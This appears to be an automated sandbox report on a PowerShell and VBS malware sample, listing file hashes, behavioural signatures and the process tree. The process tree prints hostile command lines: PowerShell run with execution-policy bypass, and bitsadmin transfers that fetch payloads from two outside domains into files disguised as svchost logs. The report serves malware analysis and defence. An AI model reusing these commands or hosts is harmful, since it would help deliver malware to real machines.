Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
29-11-2024 11:11
Static task
static1
Behavioral task
behavioral1
Sample
ckJTQEOKC/WdxzhJPH.vbs
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
ckJTQEOKC/WdxzhJPH.vbs
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
ckJTQEOKC/WdxzhJPH.ps1
Resource
win7-20240903-en
General
-
Target
ckJTQEOKC/WdxzhJPH.ps1
-
Size
2KB
-
MD5
9d6d8a084805bbf5d22507780d14e8f4
-
SHA1
27ebc6c5948855d6b5a7f1c5422a3be6a4a1e77a
-
SHA256
9092a282a5c56c0a19713fd3067b528efae5b27e9faa737c87a9bbf6a566cc5e
-
SHA512
a8142d16469fb415ad3f9212d52f0aadde797876e7735f3faebd79b57acd04688726e83047c808851ea9394b14dca0dad8c33a1e7695c4ce2a768d46a2f3597b
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
bitsadmin.exebitsadmin.exedescription pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2780 2788 bitsadmin.exe 31 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2176 2788 bitsadmin.exe 31 -
Download via BitsAdmin 1 TTPs 2 IoCs
Processes:
bitsadmin.exebitsadmin.exepid Process 2176 bitsadmin.exe 2780 bitsadmin.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid Process 3036 powershell.exe 3036 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 3036 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
powershell.exedescription pid Process procid_target PID 3036 wrote to memory of 2832 3036 powershell.exe 32 PID 3036 wrote to memory of 2832 3036 powershell.exe 32 PID 3036 wrote to memory of 2832 3036 powershell.exe 32 PID 3036 wrote to memory of 2696 3036 powershell.exe 34 PID 3036 wrote to memory of 2696 3036 powershell.exe 34 PID 3036 wrote to memory of 2696 3036 powershell.exe 34
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\WdxzhJPH.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Windows\system32\getmac.exe"C:\Windows\system32\getmac.exe" /fo table2⤵PID:2832
-
-
C:\Windows\system32\bitsadmin.exe"C:\Windows\system32\bitsadmin.exe" /reset2⤵PID:2696
-
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer jeiHpx /priority FOREGROUND "https://ghryj.eu/post//1955f2beab566dcfce6c476aa69d9e54.html" C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\0_svchost.log1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:2780
-
C:\Windows\system32\bitsadmin.exebitsadmin /transfer cOWJAB /priority FOREGROUND "https://uhfb.eu/post//1955f2beab566dcfce6c476aa69d9e54.html" C:\Users\Admin\AppData\Local\Temp\ckJTQEOKC\1_svchost.log1⤵
- Process spawned unexpected child process
- Download via BitsAdmin
PID:2176